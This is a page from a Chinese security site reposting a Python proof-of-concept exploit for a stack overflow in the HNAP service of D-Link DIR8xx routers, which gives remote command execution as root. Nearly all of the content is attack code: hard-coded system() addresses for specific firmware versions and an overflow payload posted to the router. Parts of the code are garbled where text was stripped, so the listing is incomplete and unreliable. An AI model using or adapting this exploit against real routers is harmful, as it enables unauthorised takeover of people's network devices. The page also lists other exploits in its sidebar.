首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DIR8xx Routers - Root Remote Code Execution
来源:https://embedi.com 作者:embedi 发布时间:2017-09-18  
# Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges. # E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin # E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): return struct.pack(" 0 else struct.pack(" /tmp/hacked;" print(rq.post(url, data=b"" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"", headers=headers_text).text)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DIR8xx Routers - Leak C
·D-Link DIR8xx Routers - Local
·Astaro Security Gateway 7 - Re
·Netdecision 5.8.2 - Local Priv
·Jungo DriverWizard WinDriver 1
·Digirez 3.4 - Cross-Site Reque
·WebKit JSC BytecodeGenerator::
·Digileave 1.2 - Cross-Site Req
·tcprewrite 3.4.4 Buffer Overfl
·DigiAffiliate 1.4 - Cross-Site
·MobaXtrem 10.4 Remote Code Exe
·Microsoft Windows Kernel - 'wi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved